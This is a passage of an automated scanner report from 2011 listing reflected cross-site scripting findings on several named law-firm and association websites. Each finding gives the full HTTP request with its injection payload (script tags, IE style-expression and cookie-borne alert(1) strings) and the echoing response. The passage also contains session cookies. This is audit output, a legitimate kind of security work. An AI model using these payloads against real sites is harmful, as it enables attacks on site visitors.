Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/alumniregistration.aspx
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.5.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:13:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16413


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/resource/cal.js?e6e34'><script>alert(1)</script>b030f7a5378=1&PrintPage=True'>
...[SNIP]...
5.93. http://www.wiggin.com/resource/showoffice.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /resource/showoffice.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5d882'style%3d'x%3aexpression(alert(1))'d6efee58539 was submitted in the REST URL parameter 2. This input was echoed as 5d882'style='x:expression(alert(1))'d6efee58539 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /resource/showoffice.aspx5d882'style%3d'x%3aexpression(alert(1))'d6efee58539 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 12 May 2011 17:06:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16437


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/resource/showoffice.aspx5d882'style='x:expression(alert(1))'d6efee58539&PrintPage=True'>
...[SNIP]...
5.94. http://www.wiggin.com/showAdvisory.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /showAdvisory.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50ae6'style%3d'x%3aexpression(alert(1))'1daa5f98637 was submitted in the REST URL parameter 1. This input was echoed as 50ae6'style='x:expression(alert(1))'1daa5f98637 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /showAdvisory.aspx50ae6'style%3d'x%3aexpression(alert(1))'1daa5f98637 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 12 May 2011 17:06:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16415


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/showAdvisory.aspx50ae6'style='x:expression(alert(1))'1daa5f98637&PrintPage=True'>
...[SNIP]...
5.95. http://www.wiggin.com/showSupremeCourtUpdate.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /showSupremeCourtUpdate.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 28677'style%3d'x%3aexpression(alert(1))'aab72d180d9 was submitted in the REST URL parameter 1. This input was echoed as 28677'style='x:expression(alert(1))'aab72d180d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /showSupremeCourtUpdate.aspx28677'style%3d'x%3aexpression(alert(1))'aab72d180d9 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 12 May 2011 17:06:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16447


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/showSupremeCourtUpdate.aspx28677'style='x:expression(alert(1))'aab72d180d9&PrintPage=True'>
...[SNIP]...
5.96. http://www.wiggin.com/showarea.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /showarea.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 215c2'style%3d'x%3aexpression(alert(1))'ec2c4f31e8 was submitted in the REST URL parameter 1. This input was echoed as 215c2'style='x:expression(alert(1))'ec2c4f31e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /showarea.aspx215c2'style%3d'x%3aexpression(alert(1))'ec2c4f31e8?Show=10669 HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/areas.aspx
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.2.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 16:05:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16435


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/showarea.aspx215c2'style='x:expression(alert(1))'ec2c4f31e8?Show=10669&PrintPage=True'>
...[SNIP]...
5.97. http://www.wiggin.com/showarea.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /showarea.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b516b--><script>alert(1)</script>b32062fb735 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /showarea.aspx?Show=10669&b516b--><script>alert(1)</script>b32062fb735=1 HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/areas.aspx
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.2.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 16:05:05 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 34635


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
<title>Wiggin and
...[SNIP]...
<!-- /showarea.aspx?Show=10669&b516b--><script>alert(1)</script>b32062fb735=1 Rendered in 0.203125 sec. -->
5.98. http://www.wiggin.com/showarea.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /showarea.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4d22f'><script>alert(1)</script>aef6508f946 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /showarea.aspx?Show=10669&4d22f'><script>alert(1)</script>aef6508f946=1 HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/areas.aspx
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.2.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 16:05:04 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 34630


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
<title>Wiggin and
...[SNIP]...
<a id="printthispage" target="_blank" href='showarea.aspx?Show=10669&4d22f'><script>alert(1)</script>aef6508f946=1&PrintPage=True'>
...[SNIP]...
5.99. http://www.wiggin.com/showbio.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /showbio.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9c02'style%3d'x%3aexpression(alert(1))'9cfc44b60ed was submitted in the REST URL parameter 1. This input was echoed as c9c02'style='x:expression(alert(1))'9cfc44b60ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /showbio.aspxc9c02'style%3d'x%3aexpression(alert(1))'9cfc44b60ed HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 12 May 2011 17:07:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16397


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/showbio.aspxc9c02'style='x:expression(alert(1))'9cfc44b60ed&PrintPage=True'>
...[SNIP]...
5.100. http://www.wiggin.com/showdepartment.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /showdepartment.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7b498'style%3d'x%3aexpression(alert(1))'6dfed4f3785 was submitted in the REST URL parameter 1. This input was echoed as 7b498'style='x:expression(alert(1))'6dfed4f3785 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /showdepartment.aspx7b498'style%3d'x%3aexpression(alert(1))'6dfed4f3785 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 12 May 2011 17:06:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16423


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/showdepartment.aspx7b498'style='x:expression(alert(1))'6dfed4f3785&PrintPage=True'>
...[SNIP]...
5.101. http://www.wiggin.com/showevent.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /showevent.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9d62b'style%3d'x%3aexpression(alert(1))'bf87dd6db25 was submitted in the REST URL parameter 1. This input was echoed as 9d62b'style='x:expression(alert(1))'bf87dd6db25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /showevent.aspx9d62b'style%3d'x%3aexpression(alert(1))'bf87dd6db25 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 12 May 2011 17:06:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16405


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/showevent.aspx9d62b'style='x:expression(alert(1))'bf87dd6db25&PrintPage=True'>
...[SNIP]...
5.102. http://www.wiggin.com/shownews.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /shownews.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2872b'style%3d'x%3aexpression(alert(1))'4281f3edb93 was submitted in the REST URL parameter 1. This input was echoed as 2872b'style='x:expression(alert(1))'4281f3edb93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /shownews.aspx2872b'style%3d'x%3aexpression(alert(1))'4281f3edb93 HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 12 May 2011 17:06:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16403


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/shownews.aspx2872b'style='x:expression(alert(1))'4281f3edb93&PrintPage=True'>
...[SNIP]...
5.103. http://www.wiggin.com/showoffice.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /showoffice.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3aaea'style%3d'x%3aexpression(alert(1))'2804bbe0b5e was submitted in the REST URL parameter 1. This input was echoed as 3aaea'style='x:expression(alert(1))'2804bbe0b5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /showoffice.aspx3aaea'style%3d'x%3aexpression(alert(1))'2804bbe0b5e HTTP/1.1
Host: www.wiggin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmc=159286716; __utmb=159286716.5.10.1305216148; ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 12 May 2011 17:05:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16407


<title>Wiggin and Dana LLP - </title>
<meta name="description" content="">
<meta name="MetaKeywords" content="">
<link rel="stylesheet" type="text/css" media="print" href="printstyles.css" />


...[SNIP]...
<a id="printthispage" target="_blank" href='404.aspx?404;http://www.wiggin.com:80/showoffice.aspx3aaea'style='x:expression(alert(1))'2804bbe0b5e&PrintPage=True'>
...[SNIP]...
5.104. http://www.wi-ala.org/clubportal/loginretrieval.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wi-ala.org
Path:   /clubportal/loginretrieval.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b75a"><a>8943d30aecb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /clubportal/loginretrieval.cfm?clubID=177 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=1b75a"><a>8943d30aecb
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D5%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.9.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A12%3A44%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D6%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:12:44 GMT;path=/
Content-Type: text/html; charset=UTF-8


<html xmlns="http://www.w3.org/1999/xhtml">


<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js">
...[SNIP]...
<input type="hidden" name="pgsrc" value="http://www.google.com/search?hl=en&q=1b75a"><a>8943d30aecb" />
...[SNIP]...
5.105. http://pillsburylaw.app4.hubspot.com/salog.js.aspx [hsfirstvisit cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pillsburylaw.app4.hubspot.com
Path:   /salog.js.aspx

Issue detail

The value of the hsfirstvisit cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 723e1"-alert(1)-"d1f931ddcd2 was submitted in the hsfirstvisit cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /salog.js.aspx HTTP/1.1
Host: pillsburylaw.app4.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: .ASPXANONYMOUS=StsAonAvzQEkAAAAYjYwNjBlNjMtYTcyMi00NzE0LWI1NjQtNDMyYWNlNmQ3NDBj0; hubspotutk=148ff71c-54bf-42a7-b313-024966931ee5; hsfirstvisit=http%253A%252F%252Fwww.pillsburylaw.com%252F%7chttp%253A%252F%252Fwww.google.com%252Fsearch%253Fq%253DPillsbury%252BWinthrop%252BShaw%252BPittman%2526ie%253Dutf-8%2526oe%253Dutf-8%2526aq%253Dt%2526rls%253Dorg.mozilla%253Aen-US%253Aofficial%2526client%253Dfirefox-a%7c2011-05-12%252008%253A21%253A46723e1"-alert(1)-"d1f931ddcd2; HUBSPOT95=521213100.0.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Thu, 12 May 2011 17:01:50 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 824


var hsUse20Servers = true;
var hsDayEndsIn = 39489;
var hsWeekEndsIn = 298689;
var hsMonthEndsIn = 1681089;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-05-12 13:01
...[SNIP]...
%253DPillsbury%252BWinthrop%252BShaw%252BPittman%2526ie%253Dutf-8%2526oe%253Dutf-8%2526aq%253Dt%2526rls%253Dorg.mozilla%253Aen-US%253Aofficial%2526client%253Dfirefox-a%7c2011-05-12%252008%253A21%253A46723e1"-alert(1)-"d1f931ddcd2";
var hsut = '148ff71c-54bf-42a7-b313-024966931ee5';
var hsVisitLogOff = true;


document.write(unescape("%3Cscript src='" + document.location.protocol + "//" + hs_ppa + "/salog20.js?v=2.12' type
...[SNIP]...
5.106. http://pillsburylaw.app4.hubspot.com/salog.js.aspx [hubspotutk cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pillsburylaw.app4.hubspot.com
Path:   /salog.js.aspx

Issue detail

